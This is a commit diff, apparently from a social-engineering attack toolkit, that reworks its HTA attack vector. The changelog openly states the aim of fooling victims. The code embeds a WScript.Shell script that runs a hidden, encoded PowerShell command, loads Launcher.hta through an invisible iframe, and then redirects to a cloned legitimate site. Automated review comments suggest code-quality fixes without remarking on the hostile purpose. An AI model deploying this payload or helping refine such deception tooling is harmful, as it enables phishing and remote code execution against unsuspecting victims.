Updated HTA to be a more believable attack vector
This commit is contained in:
parent
49194ee9bb
commit
3c65ccf294
4 changed files with 65 additions and 17 deletions
|
@ -7,6 +7,9 @@ version 7.0
|
|||
* updated config option to use most recent user agent string
|
||||
* massive re-haul for pep8
|
||||
* massive re-haul for python3
|
||||
* added more words to mssql wordlist
|
||||
* major refactoring of python codebase to support both python2 and python3
|
||||
* restructured HTA attack vector and improved codebase to redirect after 3 seconds to the legitimate website while still launching the HTA file, this makes it very easy to coax victim into beleiving the HTA they are running is from a legitimate link
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 6.5.9
|
||||
|
|
|
@ -172,15 +172,9 @@ try:
|
|||
###############################################################
|
||||
# HTA ATTACK VECTOR METHOD HERE
|
||||
###############################################################
|
||||
if attack_vector == '8':
|
||||
from src.webattack.hta.main import *
|
||||
# update config
|
||||
update_options("ATTACK_VECTOR=HTA")
|
||||
gen_hta_cool_stuff()
|
||||
attack_vector = "hta"
|
||||
print_status("Automatically starting Apache for you...")
|
||||
subprocess.Popen("service apache2 start",
|
||||
shell=True).wait()
|
||||
#if attack_vector == '8':
|
||||
# assign HTA attack vector - do more later
|
||||
# attack_vector = "hta"
|
||||
|
||||
# Removed to delete MLITM
|
||||
if attack_vector != "99999":
|
||||
|
@ -208,8 +202,6 @@ try:
|
|||
|
||||
try:
|
||||
# write our attack vector to file to be called later
|
||||
# print definepath()
|
||||
# os.chdir(definepath)
|
||||
filewrite = open(setdir + "/attack_vector", "w")
|
||||
|
||||
# webjacking and web templates are not allowed
|
||||
|
@ -237,6 +229,7 @@ try:
|
|||
# if attack vector is default or 1 for java applet
|
||||
if attack_vector == '':
|
||||
attack_vector = '1'
|
||||
|
||||
# specify java applet attack
|
||||
if attack_vector == '1':
|
||||
attack_vector = "java"
|
||||
|
@ -282,6 +275,13 @@ try:
|
|||
filewrite.write(attack_vector)
|
||||
filewrite.close()
|
||||
|
||||
# hta attack vector
|
||||
if attack_vector == '8':
|
||||
# call hta attack vector
|
||||
attack_vector = "hta"
|
||||
filewrite.write(attack_vector)
|
||||
filewrite.close()
|
||||
|
||||
# pull ip address
|
||||
if choice3 != "-1":
|
||||
fileopen = open(
|
||||
|
@ -375,7 +375,7 @@ try:
|
|||
setprompt(["2"], "IP address for the POST back in Harvester/Tabnabbing"))
|
||||
if check_options("IPADDR=") != 0:
|
||||
ipaddr = check_options("IPADDR=")
|
||||
update_options("IPADDR=" + ipaddr)
|
||||
update_options("IPADDR=" + ipaddr)
|
||||
|
||||
# if java applet attack
|
||||
if attack_vector == "java":
|
||||
|
@ -471,6 +471,17 @@ try:
|
|||
from src.webattack.profiler.webprofiler import *
|
||||
prep_website()
|
||||
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
if attack_vector == "hta":
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
from src.webattack.hta.main import *
|
||||
# update config
|
||||
update_options("ATTACK_VECTOR=HTA")
|
||||
gen_hta_cool_stuff()
|
||||
attack_vector = "hta"
|
||||
print_status("Automatically starting Apache for you...")
|
||||
subprocess.Popen("service apache2 start",shell=True).wait()
|
||||
|
||||
if attack_vector != "harvester":
|
||||
if attack_vector != "tabnabbing":
|
||||
if attack_vector != "multiattack":
|
||||
|
@ -500,8 +511,8 @@ try:
|
|||
# Create a website clone
|
||||
if choice3 == '2':
|
||||
# flag that we want a custom website
|
||||
sys.path.append(
|
||||
definepath + "/src/webattack/web_clone/")
|
||||
definepath = os.getcwd()
|
||||
sys.path.append(definepath + "/src/webattack/web_clone/")
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
os.remove(setdir + "/site.template")
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
|
@ -528,6 +539,17 @@ try:
|
|||
filewrite.write("\nURL=%s" % (URL))
|
||||
filewrite.close()
|
||||
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
if attack_vector == "hta":
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
from src.webattack.hta.main import *
|
||||
# update config
|
||||
update_options("ATTACK_VECTOR=HTA")
|
||||
gen_hta_cool_stuff()
|
||||
attack_vector = "hta"
|
||||
print_status("Automatically starting Apache for you...")
|
||||
subprocess.Popen("service apache2 start",shell=True).wait()
|
||||
|
||||
# grab browser exploit selection
|
||||
if attack_vector == "browser":
|
||||
# grab clientattack
|
||||
|
@ -569,6 +591,7 @@ try:
|
|||
import src.core.payloadgen.create_payloads
|
||||
|
||||
# arp cache if applicable
|
||||
definepath = os.getcwd()
|
||||
sys.path.append(definepath + "/src/core/arp_cache")
|
||||
debug_msg(
|
||||
me, "line 500: importing 'src.core.arp_cache.arp'", 1)
|
||||
|
@ -695,6 +718,17 @@ try:
|
|||
me, "importing 'src.webattack.web_clone.cloner'", 1)
|
||||
import src.webattack.web_clone.cloner
|
||||
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
if attack_vector == "hta":
|
||||
# launch HTA attack vector after the website has been cloned
|
||||
from src.webattack.hta.main import *
|
||||
# update config
|
||||
update_options("ATTACK_VECTOR=HTA")
|
||||
gen_hta_cool_stuff()
|
||||
attack_vector = "hta"
|
||||
print_status("Automatically starting Apache for you...")
|
||||
subprocess.Popen("service apache2 start",shell=True).wait()
|
||||
|
||||
# if java applet attack
|
||||
if attack_vector == "java":
|
||||
# import our payload generator
|
||||
|
|
|
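Review bot: The HTA launch block added after prep_website() (from the `from src.webattack.hta.main import *` line through the Apache start) is pasted verbatim again in the hunk at @-528 after filewrite.close() and in the hunk at @-695 after import src.webattack.web_clone.cloner; move it into one module-level helper such as `def launch_hta_after_clone():` and call it from the three places so a later fix lands once. Inside that block `subprocess.Popen("service apache2 start", shell=True).wait()` discards the exit status even though the preceding print_status tells the user Apache was started; `rc = subprocess.call(["service", "apache2", "start"])` followed by a message when rc is non-zero would make a failed start visible, and avoids shell=True for a fixed argument list. The enclosing try: begins and ends outside every hunk in this file.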
@ -1917,3 +1917,13 @@ def module_reload(module):
|
|||
|
||||
def input(string):
|
||||
return raw_input(string)
|
||||
|
||||
# fetch URL needed for web cloning
|
||||
def fetch_template():
|
||||
fileopen = open(setdir + "/site.template").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("URL=", line)
|
||||
if match:
|
||||
line = line.split("=")
|
||||
return line[1]
|
||||
|
|
|
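Review bot: fetch_template() leaks the file handle, because `open(setdir + "/site.template").readlines()` is never closed; read it under `with open(setdir + "/site.template") as fileopen:` instead. The matching branch returns `line.split("=")[1]`, which also splits on every '=' inside the value, so only the text before the second '=' comes back; `return line.split("=", 1)[1]` keeps the whole value. When no line contains 'URL=' the function falls off the end and returns None implicitly, which the gen_hta_cool_stuff() caller in src.webattack.hta.main formats into its output as the text "None"; return an explicit value or raise so the missing entry is noticed. `re.search("URL=", line)` also matches the marker anywhere in the line, so `line.startswith("URL=")` states the intent more plainly.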
@ -6,7 +6,6 @@
|
|||
######################################################
|
||||
from src.core.setcore import *
|
||||
|
||||
|
||||
def gen_hta_cool_stuff():
|
||||
print_status(
|
||||
"HTA Attack Vector selected. Enter your IP, Port, and Payload...")
|
||||
|
@ -37,8 +36,10 @@ def gen_hta_cool_stuff():
|
|||
command = "powershell -window hidden -enc " + ps
|
||||
# hta code here
|
||||
print_status("Embedding HTA attack vector and PowerShell injection...")
|
||||
main1 = """<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command)
|
||||
main2 = """<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>"""
|
||||
# grab cloned website
|
||||
url = fetch_template()
|
||||
main1 = ("""<script>\na=new ActiveXObject("WScript.Shell");\na.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);window.close();\n</script>""" % (command))
|
||||
main2 = ("""<iframe id="frame" src="Launcher.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>\n<script type="text/javascript">setTimeout(function(){window.location.href="%s";}, 3000);</script>""" % url)
|
||||
|
||||
# metasploit answer file here
|
||||
filewrite = open(setdir + "/meta_config", "w")
|
||||
|
|
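Review bot: `url = fetch_template()` is used unchecked in the new main2 string, so when site.template has no URL= line the None result is interpolated as the literal text "None" and the problem only shows up later; guard it right after the call, e.g. `if url is None: print_status("site.template contains no URL entry"); return`. The name fetch_template reaches this module only through the star import `from src.core.setcore import *`, which hides the new dependency on that helper; an explicit `from src.core.setcore import fetch_template` next to it documents where the name comes from. gen_hta_cool_stuff() starts in the hunk at @-6 and its body continues past this hunk.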